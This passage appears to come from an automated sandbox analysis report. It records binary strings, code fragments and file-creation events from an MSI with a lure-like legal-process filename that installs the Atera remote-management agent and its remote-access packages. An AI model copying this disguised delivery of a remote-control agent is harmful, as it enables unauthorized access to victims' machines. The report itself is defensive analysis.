                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: System.Threading.Tasks.dll.26.dr
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdbSHA256 source: System.Buffers.dll.26.dr
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdbJ source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.Security.Cryptography.OpenSsl.ni.pdb source: System.Security.Cryptography.OpenSsl.dll.2.dr
                                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.2.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageADRemote\AgentPackageADRemote\obj\Release\AgentPackageADRemote.pdb source: AgentPackageADRemote.exe.26.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscorrc\mscorrc.pdb source: mscorrc.dll.2.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\net6.0-Release\System.Xml.XmlSerializer.pdb source: System.Xml.XmlSerializer.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AgentPackageInternalPoller.exe, 00000037.00000000.1996426946.000001CC122B2000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1828913877.0000022AD9272000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdb source: System.Buffers.dll.26.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.26.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmp
                                Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.2.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2408601657.0000010B6F742000.00000002.00000001.01000000.00000045.sdmp
                                Source: Binary string: lib.pdb source: AgentPackageMonitoring.exe, 0000003D.00000002.2467763966.000001327BEBF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates\obj\Release\AgentPackageOsUpdates.pdb source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdbr source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdb source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmp
                                Source: Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.AccessControl\net6.0-windows-Release\System.Security.AccessControl.pdb source: System.Security.AccessControl.dll.2.dr
                                Source: Binary string: System.Security.AccessControl.ni.pdb source: System.Security.AccessControl.dll.2.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Diagnostics.DiagnosticSource\net45\System.Diagnostics.DiagnosticSource.pdb source: System.Diagnostics.DiagnosticSource.dll.16.dr
                                Source: Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: .pdbV source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: CliWrap.pdbSHA256X source: CliWrap.dll.26.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.2.dr
                                Source: Binary string: D:\a\CliWrap\CliWrap\CliWrap.Signaler\obj\Release\net35\CliWrap.Signaler.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 00000037.00000002.2102333146.000001CC12CE2000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256^Y source: AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000033.00000000.1978260272.0000024844C32000.00000002.00000001.01000000.0000002A.sdmp
                                Source: System.Security.SecureString.dll.2.dr Static PE information: 0xF14EFAAA [Wed Apr 16 11:10:34 2098 UTC]
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Code function: 37_2_00007FFB02EC1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 37_2_00007FFB02EC1910
                                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_3_04C3246F push esi; retn 0004h 6_3_04C3247A
                                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_3_04C323A9 push ebp; retn 0004h 6_3_04C323AA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 14_2_00007FFAAB56D45B push cs; retf 14_2_00007FFAAB56D465
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 16_2_00007FFAAB5A0AD8 pushad ; ret 16_2_00007FFAAB5A0AE1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 16_2_00007FFAAB59CE09 push ebx; retf 16_2_00007FFAAB59CE0A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 16_2_00007FFAAB790F6C push eax; ret 16_2_00007FFAAB790F94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 20_2_00007FFAAB5600BD pushad ; iretd 20_2_00007FFAAB5600C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 22_2_00007FFAAB5500BD pushad ; iretd 22_2_00007FFAAB5500C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 22_2_00007FFAAB565587 push ebp; iretd 22_2_00007FFAAB5655D8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 24_2_00007FFAAB5700BD pushad ; iretd 24_2_00007FFAAB5700C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 26_2_00007FFAAB5625F2 push eax; iretd 26_2_00007FFAAB562671
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 26_2_00007FFAAB55A658 push eax; retf 26_2_00007FFAAB55A669
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 26_2_00007FFAAB55A652 push eax; retf 26_2_00007FFAAB55A669
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 26_2_00007FFAAB760F7C push eax; ret 26_2_00007FFAAB760F94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 26_2_00007FFAAB7726F5 push ds; ret 26_2_00007FFAAB7726FF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB5AD2C5 pushad ; iretd 29_2_00007FFAAB5BAA45
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB5A792B push ebx; retf 29_2_00007FFAAB5A796A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB5AFEFA push FFFFFFE8h; retf 29_2_00007FFAAB5AFFF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB5AFFB8 push FFFFFFE8h; retf 29_2_00007FFAAB5AFFF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB592D95 push eax; ret 29_2_00007FFAAB592E1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB5AD350 push eax; iretd 29_2_00007FFAAB5BBB3B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB5900BD pushad ; iretd 29_2_00007FFAAB5900C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB5A8163 push ebx; ret 29_2_00007FFAAB5A816A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Code function: 29_2_00007FFAAB59F650 push eax; iretd 29_2_00007FFAAB59F65D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Code function: 32_2_00007FFAAB58F4B9 pushad ; ret 32_2_00007FFAAB58F66D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Code function: 32_2_00007FFAAB5952FA push edx; iretd 32_2_00007FFAAB596E3B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Code function: 32_2_00007FFAAB597C2E pushad ; retf 32_2_00007FFAAB597C5D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Code function: 32_2_00007FFAAB597C5E push eax; retf 32_2_00007FFAAB597C6D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Code function: 32_2_00007FFAAB5800BD pushad ; iretd 32_2_00007FFAAB5800C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Code function: 32_2_00007FFAAB59699C push eax; ret 32_2_00007FFAAB59699D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Code function: 32_2_00007FFAAB587963 push ebx; retf 32_2_00007FFAAB58796A
                                Source: System.Runtime.Numerics.dll.2.dr Static PE information: section name: .text entropy: 6.855705489890712

                                Persistence and Installation Behavior

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMarketplace.exe.log
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.Primitives.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI48B.tmp
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Extensions.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Registry.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
